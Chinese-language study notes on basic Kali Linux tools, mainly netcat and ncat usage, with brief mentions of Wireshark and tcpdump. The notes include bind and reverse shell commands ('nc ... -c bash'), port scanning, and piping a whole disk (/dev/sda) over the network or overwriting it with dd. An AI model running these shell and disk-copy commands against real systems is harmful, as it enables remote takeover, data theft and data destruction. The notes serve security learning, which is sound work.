2. 程式人生 > >【學習筆記】KALI基本工具使用

【學習筆記】KALI基本工具使用

阿新 發佈:2019-01-11

基本工具:
• 經常使⽤用且功能強⼤大
• 安全從業者必不可少的幫⼿手
• Nc / ncat
• Wireshark
• Tcpdump
NETCAT ——NC( 網路工具中的瑞士軍刀)
功能:
• 偵聽模式 / 傳輸模式
• telnet / 獲取banner資訊
• 傳輸文字資訊
• 傳輸檔案目錄
• 加密傳輸⽂檔案
• 遠端控制/木馬
• 加密所有流量
• 流媒體伺服器
• 遠端克隆硬碟
NC——TELNET / BANNER
• nc –nv 1.1.1.1 110
• nc –nv 1.1.1.1 25
• nc –nv 1.1.1.1 80
eg:ping smtp.163.com 埠: 25
ping pop3.163.com 找到IP 埠:110 需base64翻譯後的字元

nc -v連線的詳細資訊-n不進行DNS解析
NC——傳輸⽂文字資訊 
• A:nc -l -p 4444  偵聽埠   
• B:nc –nv 1.1.1.1 4444  連線埠
    ls -l |nc -vn 10.1.1.12 333 通過管道命令 顯示字埠的另一側
• 遠端電⼦子取證資訊收集
NC——傳輸檔案/目錄
•傳輸⽂檔案
    •A:nc -lp 333 > 1.mp4
    •B:nc -nv 1.1.1.1 333 < 1.mp4 –q 1
•或
    •A:nc -q 1 -lp 333 < a.mp4
    •B: nc -nv 1.1.1.1 333 > 2.mp4
•傳輸目錄
    •A:tar -cvf - music/ | nc -lp 333 –q 1
    •B:nc -nv 1.1.1.1 333 | tar -xvf –
•加密傳檔案
    •A:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
    •B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1
NC——流媒體服務
    •A: cat 1.mp4 | nc -lp 333
    •B: -vn 1.1.1.1 333 | mplayer -vo x11 -cache 3000 -
NC——埠掃描
    •nc -nvz 1.1.1.1 1-65535
    •nc –vnzu 1.1.1.1 1-1024
NC——遠端克隆硬碟
    •A: nc -lp 333 | dd of=/dev/sda
    •B: dd if=/dev/sda | nc -nv 1.1.1.1 333 –q 1
    •遠端電⼦子取證,可以將目標伺服器硬碟遠端複製,或者記憶體。
NC——遠端控制
    •正向:
    •A:nc -lp 333 -c bash
    •B:nc 1.1.1.1 333
    •反向:
    •A:nc -lp 333
    •B:nc 1.1.1.1 333 -c bash
    •注:Windows⽤使用者把bash改成cmd;
NC——NCAT(擬補nc)
    •Nc缺乏加密和⾝身份驗證的能⼒力
    •Ncat包含於nmap⼯工具包中
    •A:ncat ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl(加密)
    •B:ncat -nv 1.1.1.1 333 --ssl
    系統不同,nc引數不盡相同
WIRESHARK 
    • 抓包嗅探協議分析 
    • 安全專家必備的技能 
    • 抓包引擎 
    • Libpcap9—— Linux 
    • Winpcap10—— Windows 
    • 解碼能⼒力
資料:http://blog.jobbole.com/70907/
圖形介面

TCPDUMP 更方便的抓包

相關推薦

學習筆記KALI基本工具使用

基本工具: • 經常使⽤用且功能強⼤大 • 安全從業者必不可少的幫⼿手 • Nc / ncat • Wireshark • Tcpdump NETCAT ——NC( 網路工

學習筆記版本控制工具 GIT

前言 GIT是一個分散式的版本控制工具。 參考資料 git官方教程-中文版 及 廖雪峰老師的git教程 下文面向windows系統,所有操作使用git自帶的git bash。 編輯文字文件時不要使用記事本,可以用sublime text或notepad++.

學習筆記服務治理工具Dubbo的配置整理

dubbo的結構可分為:服務生產者Provider、服務執行容器Container、服務消費者Consumer、註冊中心Register、監控中心Monitor 作用是,暴露介面,提供服務,其他工廠需要依賴這個介面,像呼叫本地API一樣呼叫遠端API。可以提高程式碼的複用。 公共介面(打包為jar):

安全牛學習筆記kali TOP10 安全工具

信息安全 security+ kali linux kali TOP10 安全工具:burpsuite截斷信息maltego收集信息metasploit framework滲透測試框架,有許多安全工具nmap網絡發現掃描器owasp-zap 滲透、攔截、掃描工具sqlmap web註入探測wi

安全牛學習筆記Kali Linux 安裝-持久加密USB安裝、熟悉環境、熟悉BASH命令

security+ linux 信息安全 持久加密USB安裝-1LUKS: linux UNified Key Setup 磁盤分區加密規範 不依賴於操作系統的磁盤級加密 Windows——DoxBox 後端:dm-crypt 前端:cryptsetup 微軟的bitlocker將鏡像

安全牛學習筆記 Kali Linux安裝-熟悉環境

信息安全;security+;kali linux熟悉BASH命令 Ls、cd、pwd、cat、more、tail、cp、rm、top、ps、greg、ifconfig、netstat、awk、sort、route、mount、dmesg、find、whereis、Echo、vi 管道 shell腳本[

安全牛學習筆記Kali Linux實驗環境

信息安全;security+;kali linux滲透測試準備實驗環境 滲透非授權系統的弊端 搭建自己的實驗環境安裝虛擬機微軟最新版軟件 http://msdn .microsoft.com/en-ca/subscriptions/aa336858windows虛擬機 http://dev.mod

安全牛學習筆記Kali Linux使用

security+ linux 信息安全 netcat NC工具,網絡工具中的瑞士軍刀查看端口的banner信息nc作為客戶端, -v顯示詳細輸出內容, -n不解析域名pop3服務110端口打開狀態,使用coremail連接服務器端口用USER+(經base64加密的郵箱地址)smtp服務25端

安全牛學習筆記kali的安裝與配置

信息安全 kali security+ 虛擬機 vbox裝kali虛擬機1. 虛擬影像的選擇由於kali在某些軟件(ferret)上存在32位與64位的區別,為了兼容32位軟件我選擇了32位映像1、vbox下載與安裝vboxde下載與安裝就不細講,畢竟與linux沒太大關系,但安裝後的tool

安全牛學習筆記Kali實戰-Web滲透

信息安全 kali linux security+ web滲透 1、動態web: 可以接受客戶端提交的數據,動態交互數據,就會有漏洞的存在 2、web大致框架:(1)瀏覽器--->web服務器--->應用服務器--->數據庫(2)程序代碼 3、http協議基礎:

安全牛學習筆記Kali Linux滲透測試方法

信息安全 kali linux security+ 1.安全問題的根源①由於分層思想,導致每個層次的相關人員都只關心自己層次的工作,因此每個人認識系統都是片面的,而安全是全方位的,整體的,所以造成安全問題。②技術人員追求效率,導致只追求功能實現,而很容易忽略安全性的工作③由於人都是會犯錯誤的,因此

安全牛學習筆記?KALI版本更新和手動漏洞挖掘(SQL註入)

信息安全 security+ sql註入 漏洞 KALI版本更新-----第一個ROLLING RELEASEKali 2.0發布時聲稱將采用rolling release模式更新(但並未實施)Fixed-release 固定發布周期 使用軟件穩定的主流版本 發布--

學習筆記堆的定義及其建立、排序等基本操作的實現

目錄 堆的定義: 堆的基本操作的程式碼實現: 詳情請參見《演算法筆記》P335,此處只做簡單的學習筆記記錄。   堆的定義: 堆是一棵完全二叉樹,樹中的每個結點的值都不小於(或不大於)其左右孩子結點。 堆一般用於優先佇列的實現(目前不是很懂),故預設

學習筆記三:基本概念

1.語法   a.區分大小寫   b.第一個字元必須是一個字母、下劃線或者一個美元符號($);其他符號可以是字母、下環線、美元符號或數字。   c.嚴格模式:使用時新增程式碼“use strict” 2.關鍵字、保留字; 3.變數 4.資料型別   a.     五中簡單資料型別:Undefined、Null

學習筆記開發工具:1、Git的學習使用(簡單介紹)

一、Git的特點 1、較優的儲存能力; 2、比較好的效能; 3、開源的產品; 4、易備份; 5、支援離線操作; 6、定製工作流程。 二、Git的下載安裝配置 1、下載地址:https://git-scm.com/download/ 進入後選擇對應的作業系

安全牛學習筆記Kali Linux滲透測試介紹

Kali Linux滲透測試介紹 安全問題的根源         優點:分工明確,工作效率高。(把大問題簡化成易於解決的小問題)         缺點:從業人員對系統沒有整體的認識,對安全認識較為片面。(搞技術的為了提高工作效率,只追求功能實現, 很少能在實現功能後

安全牛學習筆記Kali Linux滲透測試介紹

​Kali Linux滲透測試介紹      安全問題的根源         優點:分工明確,工作效率高。         缺點:從業人員對系統沒有整體的認識,對安全認識較為片面。         最大威脅是人,人都會犯錯,安全問題不能100%絕對根除。    

學習筆記彙編:關於DEBUG工具使用的時候的一個注意事項

在學習彙編的時候發現一個簡單的程式碼出現了一個奇怪的問題詢問過後發現了DEBUG工具的一個小注意事項(或者說是沒用的知識點)ASSUME SS:STACKS,CS:CODES,DS:a,ES:b a SEGMENT ONE dw 01h,02h,03h,04h,05

學習筆記關於DOM4J:使用DOM4J解析XML文檔

文本 class 中產 獲取 ber exce int() logs hone 一、概述 DOM4J是一個易用的、開源的庫,用於XML、XPath和XSLT中。采用了Java集合框架並完全支持DOM、SAX、和JAXP。 DOM4J最大的特色是使用大量的接口,主要接口都在o

學習筆記Java中生成對象的5中方法

目標 獲得 cti com pre lan except 我們 highlight 概述:本文介紹以下java五種創建對象的方式: 1.用new語句創建對象,這是最常用的創建對象的方式。 2.使用Class類的newInstance方法 3.運用反射手段,調用java.la